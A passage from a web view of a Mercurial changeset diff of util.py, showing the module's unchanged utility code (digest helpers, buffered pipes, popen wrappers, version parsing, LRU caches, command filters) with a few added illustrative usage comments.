util: use set for reserved Windows filenames...
Gregory Szorc
r34054:ca6a3852 default
@@ -1,3773 +1,3775 @@ b''
1 1 # util.py - Mercurial utility functions and platform specific implementations
2 2 #
3 3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
5 5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 6 #
7 7 # This software may be used and distributed according to the terms of the
8 8 # GNU General Public License version 2 or any later version.
9 9
10 10 """Mercurial utility functions and platform specific implementations.
11 11
12 12 This contains helper routines that are independent of the SCM core and
13 13 hide platform-specific details from the core.
14 14 """
15 15
16 16 from __future__ import absolute_import
17 17
18 18 import abc
19 19 import bz2
20 20 import calendar
21 21 import codecs
22 22 import collections
23 23 import contextlib
24 24 import datetime
25 25 import errno
26 26 import gc
27 27 import hashlib
28 28 import imp
29 29 import os
30 30 import platform as pyplatform
31 31 import re as remod
32 32 import shutil
33 33 import signal
34 34 import socket
35 35 import stat
36 36 import string
37 37 import subprocess
38 38 import sys
39 39 import tempfile
40 40 import textwrap
41 41 import time
42 42 import traceback
43 43 import warnings
44 44 import zlib
45 45
46 46 from . import (
47 47 encoding,
48 48 error,
49 49 i18n,
50 50 policy,
51 51 pycompat,
52 52 )
53 53
54 54 base85 = policy.importmod(r'base85')
55 55 osutil = policy.importmod(r'osutil')
56 56 parsers = policy.importmod(r'parsers')
57 57
58 58 b85decode = base85.b85decode
59 59 b85encode = base85.b85encode
60 60
61 61 cookielib = pycompat.cookielib
62 62 empty = pycompat.empty
63 63 httplib = pycompat.httplib
64 64 httpserver = pycompat.httpserver
65 65 pickle = pycompat.pickle
66 66 queue = pycompat.queue
67 67 socketserver = pycompat.socketserver
68 68 stderr = pycompat.stderr
69 69 stdin = pycompat.stdin
70 70 stdout = pycompat.stdout
71 71 stringio = pycompat.stringio
72 72 urlerr = pycompat.urlerr
73 73 urlreq = pycompat.urlreq
74 74 xmlrpclib = pycompat.xmlrpclib
75 75
76 76 # workaround for win32mbcs
77 77 _filenamebytestr = pycompat.bytestr
78 78
79 79 def isatty(fp):
80 80 try:
81 81 return fp.isatty()
82 82 except AttributeError:
83 83 return False
84 84
85 85 # glibc determines buffering on first write to stdout - if we replace a
86 86 # TTY-destined stdout with a pipe-destined stdout (e.g. pager), we want line
87 87 # buffering
88 88 if isatty(stdout):
89 89 stdout = os.fdopen(stdout.fileno(), pycompat.sysstr('wb'), 1)
90 90
91 91 if pycompat.osname == 'nt':
92 92 from . import windows as platform
93 93 stdout = platform.winstdout(stdout)
94 94 else:
95 95 from . import posix as platform
96 96
97 97 _ = i18n._
98 98
99 99 bindunixsocket = platform.bindunixsocket
100 100 cachestat = platform.cachestat
101 101 checkexec = platform.checkexec
102 102 checklink = platform.checklink
103 103 copymode = platform.copymode
104 104 executablepath = platform.executablepath
105 105 expandglobs = platform.expandglobs
106 106 explainexit = platform.explainexit
107 107 findexe = platform.findexe
108 108 gethgcmd = platform.gethgcmd
109 109 getuser = platform.getuser
110 110 getpid = os.getpid
111 111 groupmembers = platform.groupmembers
112 112 groupname = platform.groupname
113 113 hidewindow = platform.hidewindow
114 114 isexec = platform.isexec
115 115 isowner = platform.isowner
116 116 listdir = osutil.listdir
117 117 localpath = platform.localpath
118 118 lookupreg = platform.lookupreg
119 119 makedir = platform.makedir
120 120 nlinks = platform.nlinks
121 121 normpath = platform.normpath
122 122 normcase = platform.normcase
123 123 normcasespec = platform.normcasespec
124 124 normcasefallback = platform.normcasefallback
125 125 openhardlinks = platform.openhardlinks
126 126 oslink = platform.oslink
127 127 parsepatchoutput = platform.parsepatchoutput
128 128 pconvert = platform.pconvert
129 129 poll = platform.poll
130 130 popen = platform.popen
131 131 posixfile = platform.posixfile
132 132 quotecommand = platform.quotecommand
133 133 readpipe = platform.readpipe
134 134 rename = platform.rename
135 135 removedirs = platform.removedirs
136 136 samedevice = platform.samedevice
137 137 samefile = platform.samefile
138 138 samestat = platform.samestat
139 139 setbinary = platform.setbinary
140 140 setflags = platform.setflags
141 141 setsignalhandler = platform.setsignalhandler
142 142 shellquote = platform.shellquote
143 143 spawndetached = platform.spawndetached
144 144 split = platform.split
145 145 sshargs = platform.sshargs
146 146 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
147 147 statisexec = platform.statisexec
148 148 statislink = platform.statislink
149 149 testpid = platform.testpid
150 150 umask = platform.umask
151 151 unlink = platform.unlink
152 152 username = platform.username
153 153
154 154 try:
155 155 recvfds = osutil.recvfds
156 156 except AttributeError:
157 157 pass
158 158 try:
159 159 setprocname = osutil.setprocname
160 160 except AttributeError:
161 161 pass
162 162
163 163 # Python compatibility
164 164
165 165 _notset = object()
166 166
167 167 # disable Python's problematic floating point timestamps (issue4836)
168 168 # (Python hypocritically says you shouldn't change this behavior in
169 169 # libraries, and sure enough Mercurial is not a library.)
170 170 os.stat_float_times(False)
171 171
172 172 def safehasattr(thing, attr):
173 173 return getattr(thing, attr, _notset) is not _notset
174 174
175 175 def bytesinput(fin, fout, *args, **kwargs):
176 176 sin, sout = sys.stdin, sys.stdout
177 177 try:
178 178 sys.stdin, sys.stdout = encoding.strio(fin), encoding.strio(fout)
179 179 return encoding.strtolocal(pycompat.rawinput(*args, **kwargs))
180 180 finally:
181 181 sys.stdin, sys.stdout = sin, sout
182 182
183 183 def bitsfrom(container):
184 184 bits = 0
185 185 for bit in container:
186 186 bits |= bit
187 187 return bits
188 188
189 189 # python 2.6 still has deprecation warnings enabled by default. We do not want
190 190 # to display anything to the standard user, so detect if we are running tests
191 191 # and only use python deprecation warnings in this case.
192 192 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
193 193 if _dowarn:
194 194 # explicitly unfilter our warning for python 2.7
195 195 #
196 196 # The option of setting PYTHONWARNINGS in the test runner was investigated.
197 197 # However, module name set through PYTHONWARNINGS was exactly matched, so
198 198 # we cannot set 'mercurial' and have it match e.g. 'mercurial.scmutil'. This
199 199 # makes the whole PYTHONWARNINGS thing useless for our use case.
200 200 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
201 201 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
202 202 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
203 203
204 204 def nouideprecwarn(msg, version, stacklevel=1):
205 205 """Issue an python native deprecation warning
206 206
207 207 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
208 208 """
209 209 if _dowarn:
210 210 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
211 211 " update your code.)") % version
212 212 warnings.warn(msg, DeprecationWarning, stacklevel + 1)
213 213
214 214 DIGESTS = {
215 215 'md5': hashlib.md5,
216 216 'sha1': hashlib.sha1,
217 217 'sha512': hashlib.sha512,
218 218 }
219 219 # List of digest types from strongest to weakest
220 220 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
221 221
222 222 for k in DIGESTS_BY_STRENGTH:
223 223 assert k in DIGESTS
224 224
225 225 class digester(object):
226 226 """helper to compute digests.
227 227
228 228 This helper can be used to compute one or more digests given their name.
229 229
230 230 >>> d = digester(['md5', 'sha1'])
231 231 >>> d.update('foo')
232 232 >>> [k for k in sorted(d)]
233 233 ['md5', 'sha1']
234 234 >>> d['md5']
235 235 'acbd18db4cc2f85cedef654fccc4a4d8'
236 236 >>> d['sha1']
237 237 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
238 238 >>> digester.preferred(['md5', 'sha1'])
239 239 'sha1'
240 240 """
241 241
242 242 def __init__(self, digests, s=''):
243 243 self._hashes = {}
244 244 for k in digests:
245 245 if k not in DIGESTS:
246 246 raise Abort(_('unknown digest type: %s') % k)
247 247 self._hashes[k] = DIGESTS[k]()
248 248 if s:
249 249 self.update(s)
250 250
251 251 def update(self, data):
252 252 for h in self._hashes.values():
253 253 h.update(data)
254 254
255 255 def __getitem__(self, key):
256 256 if key not in DIGESTS:
257 257 raise Abort(_('unknown digest type: %s') % key)
258 258 return self._hashes[key].hexdigest()
259 259
260 260 def __iter__(self):
261 261 return iter(self._hashes)
262 262
263 263 @staticmethod
264 264 def preferred(supported):
265 265 """returns the strongest digest type in both supported and DIGESTS."""
266 266
267 267 for k in DIGESTS_BY_STRENGTH:
268 268 if k in supported:
269 269 return k
270 270 return None
271 271
272 272 class digestchecker(object):
273 273 """file handle wrapper that additionally checks content against a given
274 274 size and digests.
275 275
276 276 d = digestchecker(fh, size, {'md5': '...'})
277 277
278 278 When multiple digests are given, all of them are validated.
279 279 """
280 280
281 281 def __init__(self, fh, size, digests):
282 282 self._fh = fh
283 283 self._size = size
284 284 self._got = 0
285 285 self._digests = dict(digests)
286 286 self._digester = digester(self._digests.keys())
287 287
288 288 def read(self, length=-1):
289 289 content = self._fh.read(length)
290 290 self._digester.update(content)
291 291 self._got += len(content)
292 292 return content
293 293
294 294 def validate(self):
295 295 if self._size != self._got:
296 296 raise Abort(_('size mismatch: expected %d, got %d') %
297 297 (self._size, self._got))
298 298 for k, v in self._digests.items():
299 299 if v != self._digester[k]:
300 300 # i18n: first parameter is a digest name
301 301 raise Abort(_('%s mismatch: expected %s, got %s') %
302 302 (k, v, self._digester[k]))
303 303
304 304 try:
305 305 buffer = buffer
306 306 except NameError:
307 307 def buffer(sliceable, offset=0, length=None):
308 308 if length is not None:
309 309 return memoryview(sliceable)[offset:offset + length]
310 310 return memoryview(sliceable)[offset:]
311 311
312 312 closefds = pycompat.osname == 'posix'
313 313
314 314 _chunksize = 4096
315 315
316 316 class bufferedinputpipe(object):
317 317 """a manually buffered input pipe
318 318
319 319 Python will not let us use buffered IO and lazy reading with 'polling' at
320 320 the same time. We cannot probe the buffer state and select will not detect
321 321 that data are ready to read if they are already buffered.
322 322
323 323 This class lets us work around that by implementing its own buffering
324 324 (allowing efficient readline) while offering a way to know if the buffer is
325 325 empty from the output (allowing collaboration of the buffer with polling).
326 326
327 327 This class lives in the 'util' module because it makes use of the 'os'
328 328 module from the python stdlib.
329 329 """
330 330
331 331 def __init__(self, input):
332 332 self._input = input
333 333 self._buffer = []
334 334 self._eof = False
335 335 self._lenbuf = 0
336 336
337 337 @property
338 338 def hasbuffer(self):
339 339 """True is any data is currently buffered
340 340
341 341 This will be used externally as a pre-step for polling IO. If there is
342 342 already data then no polling should be set in place."""
343 343 return bool(self._buffer)
344 344
345 345 @property
346 346 def closed(self):
347 347 return self._input.closed
348 348
349 349 def fileno(self):
350 350 return self._input.fileno()
351 351
352 352 def close(self):
353 353 return self._input.close()
354 354
355 355 def read(self, size):
356 356 while (not self._eof) and (self._lenbuf < size):
357 357 self._fillbuffer()
358 358 return self._frombuffer(size)
359 359
360 360 def readline(self, *args, **kwargs):
361 361 if 1 < len(self._buffer):
362 362 # this should not happen because both read and readline end with a
363 363 # _frombuffer call that collapses it.
364 364 self._buffer = [''.join(self._buffer)]
365 365 self._lenbuf = len(self._buffer[0])
366 366 lfi = -1
367 367 if self._buffer:
368 368 lfi = self._buffer[-1].find('\n')
369 369 while (not self._eof) and lfi < 0:
370 370 self._fillbuffer()
371 371 if self._buffer:
372 372 lfi = self._buffer[-1].find('\n')
373 373 size = lfi + 1
374 374 if lfi < 0: # end of file
375 375 size = self._lenbuf
376 376 elif 1 < len(self._buffer):
377 377 # we need to take previous chunks into account
378 378 size += self._lenbuf - len(self._buffer[-1])
379 379 return self._frombuffer(size)
380 380
381 381 def _frombuffer(self, size):
382 382 """return at most 'size' data from the buffer
383 383
384 384 The data are removed from the buffer."""
385 385 if size == 0 or not self._buffer:
386 386 return ''
387 387 buf = self._buffer[0]
388 388 if 1 < len(self._buffer):
389 389 buf = ''.join(self._buffer)
390 390
391 391 data = buf[:size]
392 392 buf = buf[len(data):]
393 393 if buf:
394 394 self._buffer = [buf]
395 395 self._lenbuf = len(buf)
396 396 else:
397 397 self._buffer = []
398 398 self._lenbuf = 0
399 399 return data
400 400
401 401 def _fillbuffer(self):
402 402 """read data to the buffer"""
403 403 data = os.read(self._input.fileno(), _chunksize)
404 404 if not data:
405 405 self._eof = True
406 406 else:
407 407 self._lenbuf += len(data)
408 408 self._buffer.append(data)
409 409
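# A minimal usage sketch (illustrative, not from the original source): the
# buffer-aware polling described in the class docstring above. 'proc' is a
# hypothetical subprocess whose stdout we wrap; we only block in select()
# when nothing is already hidden in the buffer.
#
#   import select
#   pipe = bufferedinputpipe(proc.stdout)
#   while True:
#       if not pipe.hasbuffer:
#           select.select([pipe], [], [])  # safe: buffer is known to be empty
#       line = pipe.readline()
#       if not line:
#           break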
410 410 def popen2(cmd, env=None, newlines=False):
411 411 # Setting bufsize to -1 lets the system decide the buffer size.
412 412 # The default for bufsize is 0, meaning unbuffered. This leads to
413 413 # poor performance on Mac OS X: http://bugs.python.org/issue4194
414 414 p = subprocess.Popen(cmd, shell=True, bufsize=-1,
415 415 close_fds=closefds,
416 416 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
417 417 universal_newlines=newlines,
418 418 env=env)
419 419 return p.stdin, p.stdout
420 420
421 421 def popen3(cmd, env=None, newlines=False):
422 422 stdin, stdout, stderr, p = popen4(cmd, env, newlines)
423 423 return stdin, stdout, stderr
424 424
425 425 def popen4(cmd, env=None, newlines=False, bufsize=-1):
426 426 p = subprocess.Popen(cmd, shell=True, bufsize=bufsize,
427 427 close_fds=closefds,
428 428 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
429 429 stderr=subprocess.PIPE,
430 430 universal_newlines=newlines,
431 431 env=env)
432 432 return p.stdin, p.stdout, p.stderr, p
433 433
434 434 def version():
435 435 """Return version information if available."""
436 436 try:
437 437 from . import __version__
438 438 return __version__.version
439 439 except ImportError:
440 440 return 'unknown'
441 441
442 442 def versiontuple(v=None, n=4):
443 443 """Parses a Mercurial version string into an N-tuple.
444 444
445 445 The version string to be parsed is specified with the ``v`` argument.
446 446 If it isn't defined, the current Mercurial version string will be parsed.
447 447
448 448 ``n`` can be 2, 3, or 4. Here is how some version strings map to
449 449 returned values:
450 450
451 451 >>> v = '3.6.1+190-df9b73d2d444'
452 452 >>> versiontuple(v, 2)
453 453 (3, 6)
454 454 >>> versiontuple(v, 3)
455 455 (3, 6, 1)
456 456 >>> versiontuple(v, 4)
457 457 (3, 6, 1, '190-df9b73d2d444')
458 458
459 459 >>> versiontuple('3.6.1+190-df9b73d2d444+20151118')
460 460 (3, 6, 1, '190-df9b73d2d444+20151118')
461 461
462 462 >>> v = '3.6'
463 463 >>> versiontuple(v, 2)
464 464 (3, 6)
465 465 >>> versiontuple(v, 3)
466 466 (3, 6, None)
467 467 >>> versiontuple(v, 4)
468 468 (3, 6, None, None)
469 469
470 470 >>> v = '3.9-rc'
471 471 >>> versiontuple(v, 2)
472 472 (3, 9)
473 473 >>> versiontuple(v, 3)
474 474 (3, 9, None)
475 475 >>> versiontuple(v, 4)
476 476 (3, 9, None, 'rc')
477 477
478 478 >>> v = '3.9-rc+2-02a8fea4289b'
479 479 >>> versiontuple(v, 2)
480 480 (3, 9)
481 481 >>> versiontuple(v, 3)
482 482 (3, 9, None)
483 483 >>> versiontuple(v, 4)
484 484 (3, 9, None, 'rc+2-02a8fea4289b')
485 485 """
486 486 if not v:
487 487 v = version()
488 488 parts = remod.split('[\+-]', v, 1)
489 489 if len(parts) == 1:
490 490 vparts, extra = parts[0], None
491 491 else:
492 492 vparts, extra = parts
493 493
494 494 vints = []
495 495 for i in vparts.split('.'):
496 496 try:
497 497 vints.append(int(i))
498 498 except ValueError:
499 499 break
500 500 # (3, 6) -> (3, 6, None)
501 501 while len(vints) < 3:
502 502 vints.append(None)
503 503
504 504 if n == 2:
505 505 return (vints[0], vints[1])
506 506 if n == 3:
507 507 return (vints[0], vints[1], vints[2])
508 508 if n == 4:
509 509 return (vints[0], vints[1], vints[2], extra)
510 510
511 511 # used by parsedate
512 512 defaultdateformats = (
513 513 '%Y-%m-%dT%H:%M:%S', # the 'real' ISO8601
514 514 '%Y-%m-%dT%H:%M', # without seconds
515 515 '%Y-%m-%dT%H%M%S', # another awful but legal variant without :
516 516 '%Y-%m-%dT%H%M', # without seconds
517 517 '%Y-%m-%d %H:%M:%S', # our common legal variant
518 518 '%Y-%m-%d %H:%M', # without seconds
519 519 '%Y-%m-%d %H%M%S', # without :
520 520 '%Y-%m-%d %H%M', # without seconds
521 521 '%Y-%m-%d %I:%M:%S%p',
522 522 '%Y-%m-%d %H:%M',
523 523 '%Y-%m-%d %I:%M%p',
524 524 '%Y-%m-%d',
525 525 '%m-%d',
526 526 '%m/%d',
527 527 '%m/%d/%y',
528 528 '%m/%d/%Y',
529 529 '%a %b %d %H:%M:%S %Y',
530 530 '%a %b %d %I:%M:%S%p %Y',
531 531 '%a, %d %b %Y %H:%M:%S', # GNU coreutils "/bin/date --rfc-2822"
532 532 '%b %d %H:%M:%S %Y',
533 533 '%b %d %I:%M:%S%p %Y',
534 534 '%b %d %H:%M:%S',
535 535 '%b %d %I:%M:%S%p',
536 536 '%b %d %H:%M',
537 537 '%b %d %I:%M%p',
538 538 '%b %d %Y',
539 539 '%b %d',
540 540 '%H:%M:%S',
541 541 '%I:%M:%S%p',
542 542 '%H:%M',
543 543 '%I:%M%p',
544 544 )
545 545
546 546 extendeddateformats = defaultdateformats + (
547 547 "%Y",
548 548 "%Y-%m",
549 549 "%b",
550 550 "%b %Y",
551 551 )
552 552
553 553 def cachefunc(func):
554 554 '''cache the result of function calls'''
555 555 # XXX doesn't handle keyword args
556 556 if func.__code__.co_argcount == 0:
557 557 cache = []
558 558 def f():
559 559 if len(cache) == 0:
560 560 cache.append(func())
561 561 return cache[0]
562 562 return f
563 563 cache = {}
564 564 if func.__code__.co_argcount == 1:
565 565 # we gain a small amount of time because
566 566 # we don't need to pack/unpack the list
567 567 def f(arg):
568 568 if arg not in cache:
569 569 cache[arg] = func(arg)
570 570 return cache[arg]
571 571 else:
572 572 def f(*args):
573 573 if args not in cache:
574 574 cache[args] = func(*args)
575 575 return cache[args]
576 576
577 577 return f
578 578
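# A minimal usage sketch (illustrative, not from the original source):
# cachefunc memoizes by positional arguments, so the recursive calls below
# become dict lookups after the first evaluation for each distinct n.
#
#   @cachefunc
#   def fib(n):
#       return n if n < 2 else fib(n - 1) + fib(n - 2)
#
#   fib(30)  # each distinct n is computed once, then served from the cache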
579 579 class sortdict(collections.OrderedDict):
580 580 '''a simple sorted dictionary
581 581
582 582 >>> d1 = sortdict([('a', 0), ('b', 1)])
583 583 >>> d2 = d1.copy()
584 584 >>> d2
585 585 sortdict([('a', 0), ('b', 1)])
586 586 >>> d2.update([('a', 2)])
587 587 >>> d2.keys() # should still be in last-set order
588 588 ['b', 'a']
589 589 '''
590 590
591 591 def __setitem__(self, key, value):
592 592 if key in self:
593 593 del self[key]
594 594 super(sortdict, self).__setitem__(key, value)
595 595
596 596 if pycompat.ispypy:
597 597 # __setitem__() isn't called as of PyPy 5.8.0
598 598 def update(self, src):
599 599 if isinstance(src, dict):
600 600 src = src.iteritems()
601 601 for k, v in src:
602 602 self[k] = v
603 603
604 604 class transactional(object):
605 605 """Base class for making a transactional type into a context manager."""
606 606 __metaclass__ = abc.ABCMeta
607 607
608 608 @abc.abstractmethod
609 609 def close(self):
610 610 """Successfully closes the transaction."""
611 611
612 612 @abc.abstractmethod
613 613 def release(self):
614 614 """Marks the end of the transaction.
615 615
616 616 If the transaction has not been closed, it will be aborted.
617 617 """
618 618
619 619 def __enter__(self):
620 620 return self
621 621
622 622 def __exit__(self, exc_type, exc_val, exc_tb):
623 623 try:
624 624 if exc_type is None:
625 625 self.close()
626 626 finally:
627 627 self.release()
628 628
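# A minimal sketch (illustrative, not from the original source) of a
# transactional subclass. Used as a context manager, close() runs only on
# success and release() always runs, aborting if close() was never reached.
#
#   class demotxn(transactional):
#       def __init__(self):
#           self.state = 'pending'
#       def close(self):
#           self.state = 'committed'
#       def release(self):
#           if self.state != 'committed':
#               self.state = 'aborted'
#
#   with demotxn() as txn:
#       pass  # an exception raised here would leave txn.state == 'aborted'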
629 629 @contextlib.contextmanager
630 630 def acceptintervention(tr=None):
631 631 """A context manager that closes the transaction on InterventionRequired
632 632
633 633 If no transaction was provided, this simply runs the body and returns
634 634 """
635 635 if not tr:
636 636 yield
637 637 return
638 638 try:
639 639 yield
640 640 tr.close()
641 641 except error.InterventionRequired:
642 642 tr.close()
643 643 raise
644 644 finally:
645 645 tr.release()
646 646
647 647 @contextlib.contextmanager
648 648 def nullcontextmanager():
649 649 yield
650 650
651 651 class _lrucachenode(object):
652 652 """A node in a doubly linked list.
653 653
654 654 Holds a reference to nodes on either side as well as a key-value
655 655 pair for the dictionary entry.
656 656 """
657 657 __slots__ = (u'next', u'prev', u'key', u'value')
658 658
659 659 def __init__(self):
660 660 self.next = None
661 661 self.prev = None
662 662
663 663 self.key = _notset
664 664 self.value = None
665 665
666 666 def markempty(self):
667 667 """Mark the node as emptied."""
668 668 self.key = _notset
669 669
670 670 class lrucachedict(object):
671 671 """Dict that caches most recent accesses and sets.
672 672
673 673 The dict consists of an actual backing dict - indexed by original
674 674 key - and a doubly linked circular list defining the order of entries in
675 675 the cache.
676 676
677 677 The head node is the newest entry in the cache. If the cache is full,
678 678 we recycle head.prev and make it the new head. Cache accesses result in
679 679 the node being moved to before the existing head and being marked as the
680 680 new head node.
681 681 """
682 682 def __init__(self, max):
683 683 self._cache = {}
684 684
685 685 self._head = head = _lrucachenode()
686 686 head.prev = head
687 687 head.next = head
688 688 self._size = 1
689 689 self._capacity = max
690 690
691 691 def __len__(self):
692 692 return len(self._cache)
693 693
694 694 def __contains__(self, k):
695 695 return k in self._cache
696 696
697 697 def __iter__(self):
698 698 # We don't have to iterate in cache order, but why not.
699 699 n = self._head
700 700 for i in range(len(self._cache)):
701 701 yield n.key
702 702 n = n.next
703 703
704 704 def __getitem__(self, k):
705 705 node = self._cache[k]
706 706 self._movetohead(node)
707 707 return node.value
708 708
709 709 def __setitem__(self, k, v):
710 710 node = self._cache.get(k)
711 711 # Replace existing value and mark as newest.
712 712 if node is not None:
713 713 node.value = v
714 714 self._movetohead(node)
715 715 return
716 716
717 717 if self._size < self._capacity:
718 718 node = self._addcapacity()
719 719 else:
720 720 # Grab the last/oldest item.
721 721 node = self._head.prev
722 722
723 723 # At capacity. Kill the old entry.
724 724 if node.key is not _notset:
725 725 del self._cache[node.key]
726 726
727 727 node.key = k
728 728 node.value = v
729 729 self._cache[k] = node
730 730 # And mark it as newest entry. No need to adjust order since it
731 731 # is already self._head.prev.
732 732 self._head = node
733 733
734 734 def __delitem__(self, k):
735 735 node = self._cache.pop(k)
736 736 node.markempty()
737 737
738 738 # Temporarily mark as newest item before re-adjusting head to make
739 739 # this node the oldest item.
740 740 self._movetohead(node)
741 741 self._head = node.next
742 742
743 743 # Additional dict methods.
744 744
745 745 def get(self, k, default=None):
746 746 try:
747 747 return self._cache[k].value
748 748 except KeyError:
749 749 return default
750 750
751 751 def clear(self):
752 752 n = self._head
753 753 while n.key is not _notset:
754 754 n.markempty()
755 755 n = n.next
756 756
757 757 self._cache.clear()
758 758
759 759 def copy(self):
760 760 result = lrucachedict(self._capacity)
761 761 n = self._head.prev
762 762 # Iterate in oldest-to-newest order, so the copy has the right ordering
763 763 for i in range(len(self._cache)):
764 764 result[n.key] = n.value
765 765 n = n.prev
766 766 return result
767 767
768 768 def _movetohead(self, node):
769 769 """Mark a node as the newest, making it the new head.
770 770
771 771 When a node is accessed, it becomes the freshest entry in the LRU
772 772 list, which is denoted by self._head.
773 773
774 774 Visually, let's make ``N`` the new head node (* denotes head):
775 775
776 776 previous/oldest <-> head <-> next/next newest
777 777
778 778 ----<->--- A* ---<->-----
779 779 | |
780 780 E <-> D <-> N <-> C <-> B
781 781
782 782 To:
783 783
784 784 ----<->--- N* ---<->-----
785 785 | |
786 786 E <-> D <-> C <-> B <-> A
787 787
788 788 This requires the following moves:
789 789
790 790 C.next = D (node.prev.next = node.next)
791 791 D.prev = C (node.next.prev = node.prev)
792 792 E.next = N (head.prev.next = node)
793 793 N.prev = E (node.prev = head.prev)
794 794 N.next = A (node.next = head)
795 795 A.prev = N (head.prev = node)
796 796 """
797 797 head = self._head
798 798 # C.next = D
799 799 node.prev.next = node.next
800 800 # D.prev = C
801 801 node.next.prev = node.prev
802 802 # N.prev = E
803 803 node.prev = head.prev
804 804 # N.next = A
805 805 # It is tempting to do just "head" here, however if node is
806 806 # adjacent to head, this will do bad things.
807 807 node.next = head.prev.next
808 808 # E.next = N
809 809 node.next.prev = node
810 810 # A.prev = N
811 811 node.prev.next = node
812 812
813 813 self._head = node
814 814
815 815 def _addcapacity(self):
816 816 """Add a node to the circular linked list.
817 817
818 818 The new node is inserted before the head node.
819 819 """
820 820 head = self._head
821 821 node = _lrucachenode()
822 822 head.prev.next = node
823 823 node.prev = head.prev
824 824 node.next = head
825 825 head.prev = node
826 826 self._size += 1
827 827 return node
828 828
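# A minimal usage sketch (illustrative, not from the original source): once
# the dict is at capacity, setting a new key recycles head.prev (the oldest
# node), exactly as the class docstring above describes.
#
#   d = lrucachedict(2)
#   d['a'] = 1
#   d['b'] = 2
#   d['a']          # access marks 'a' as the newest entry
#   d['c'] = 3      # evicts 'b', the least recently used entry
#   'b' in d        # -> False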
829 829 def lrucachefunc(func):
830 830 '''cache most recent results of function calls'''
831 831 cache = {}
832 832 order = collections.deque()
833 833 if func.__code__.co_argcount == 1:
834 834 def f(arg):
835 835 if arg not in cache:
836 836 if len(cache) > 20:
837 837 del cache[order.popleft()]
838 838 cache[arg] = func(arg)
839 839 else:
840 840 order.remove(arg)
841 841 order.append(arg)
842 842 return cache[arg]
843 843 else:
844 844 def f(*args):
845 845 if args not in cache:
846 846 if len(cache) > 20:
847 847 del cache[order.popleft()]
848 848 cache[args] = func(*args)
849 849 else:
850 850 order.remove(args)
851 851 order.append(args)
852 852 return cache[args]
853 853
854 854 return f
855 855
856 856 class propertycache(object):
857 857 def __init__(self, func):
858 858 self.func = func
859 859 self.name = func.__name__
860 860 def __get__(self, obj, type=None):
861 861 result = self.func(obj)
862 862 self.cachevalue(obj, result)
863 863 return result
864 864
865 865 def cachevalue(self, obj, value):
866 866 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
867 867 obj.__dict__[self.name] = value
868 868
869 869 def pipefilter(s, cmd):
870 870 '''filter string S through command CMD, returning its output'''
871 871 p = subprocess.Popen(cmd, shell=True, close_fds=closefds,
872 872 stdin=subprocess.PIPE, stdout=subprocess.PIPE)
873 873 pout, perr = p.communicate(s)
874 874 return pout
875 875
876 876 def tempfilter(s, cmd):
877 877 '''filter string S through a pair of temporary files with CMD.
878 878 CMD is used as a template to create the real command to be run,
879 879 with the strings INFILE and OUTFILE replaced by the real names of
880 880 the temporary files generated.'''
881 881 inname, outname = None, None
882 882 try:
883 883 infd, inname = tempfile.mkstemp(prefix='hg-filter-in-')
884 884 fp = os.fdopen(infd, pycompat.sysstr('wb'))
885 885 fp.write(s)
886 886 fp.close()
887 887 outfd, outname = tempfile.mkstemp(prefix='hg-filter-out-')
888 888 os.close(outfd)
889 889 cmd = cmd.replace('INFILE', inname)
890 890 cmd = cmd.replace('OUTFILE', outname)
891 891 code = os.system(cmd)
892 892 if pycompat.sysplatform == 'OpenVMS' and code & 1:
893 893 code = 0
894 894 if code:
895 895 raise Abort(_("command '%s' failed: %s") %
896 896 (cmd, explainexit(code)))
897 897 return readfile(outname)
898 898 finally:
899 899 try:
900 900 if inname:
901 901 os.unlink(inname)
902 902 except OSError:
903 903 pass
904 904 try:
905 905 if outname:
906 906 os.unlink(outname)
907 907 except OSError:
908 908 pass
909 909
910 910 filtertable = {
911 911 'tempfile:': tempfilter,
912 912 'pipe:': pipefilter,
913 913 }
914 914
915 915 def filter(s, cmd):
916 916 "filter a string through a command that transforms its input to its output"
917 917 for name, fn in filtertable.iteritems():
918 918 if cmd.startswith(name):
919 919 return fn(s, cmd[len(name):].lstrip())
920 920 return pipefilter(s, cmd)
921 921
922 922 def binary(s):
923 923 """return true if a string is binary data"""
924 924 return bool(s and '\0' in s)
925 925
926 926 def increasingchunks(source, min=1024, max=65536):
927 927 '''return no less than min bytes per chunk while data remains,
928 928 doubling min after each chunk until it reaches max'''
929 929 def log2(x):
930 930 if not x:
931 931 return 0
932 932 i = 0
933 933 while x:
934 934 x >>= 1
935 935 i += 1
936 936 return i - 1
937 937
938 938 buf = []
939 939 blen = 0
940 940 for chunk in source:
941 941 buf.append(chunk)
942 942 blen += len(chunk)
943 943 if blen >= min:
944 944 if min < max:
945 945 min = min << 1
946 946 nmin = 1 << log2(blen)
947 947 if nmin > min:
948 948 min = nmin
949 949 if min > max:
950 950 min = max
951 951 yield ''.join(buf)
952 952 blen = 0
953 953 buf = []
954 954 if buf:
955 955 yield ''.join(buf)
956 956
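# A minimal usage sketch (illustrative, not from the original source): feeding
# many small chunks yields progressively larger joined chunks, roughly
# doubling from 'min' toward 'max'.
#
#   chunks = increasingchunks(iter(['x' * 512] * 64), min=1024, max=4096)
#   [len(c) for c in chunks]  # e.g. [1024, 2048, 4096, ...] before the tail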
957 957 Abort = error.Abort
958 958
959 959 def always(fn):
960 960 return True
961 961
962 962 def never(fn):
963 963 return False
964 964
965 965 def nogc(func):
966 966 """disable garbage collector
967 967
968 968 Python's garbage collector triggers a GC each time a certain number of
969 969 container objects (the number being defined by gc.get_threshold()) are
970 970 allocated even when marked not to be tracked by the collector. Tracking has
971 971 no effect on when GCs are triggered, only on what objects the GC looks
972 972 into. As a workaround, disable GC while building complex (huge)
973 973 containers.
974 974
975 975 This garbage collector issue has been fixed in 2.7, but it still affects
976 976 CPython's performance.
977 977 """
978 978 def wrapper(*args, **kwargs):
979 979 gcenabled = gc.isenabled()
980 980 gc.disable()
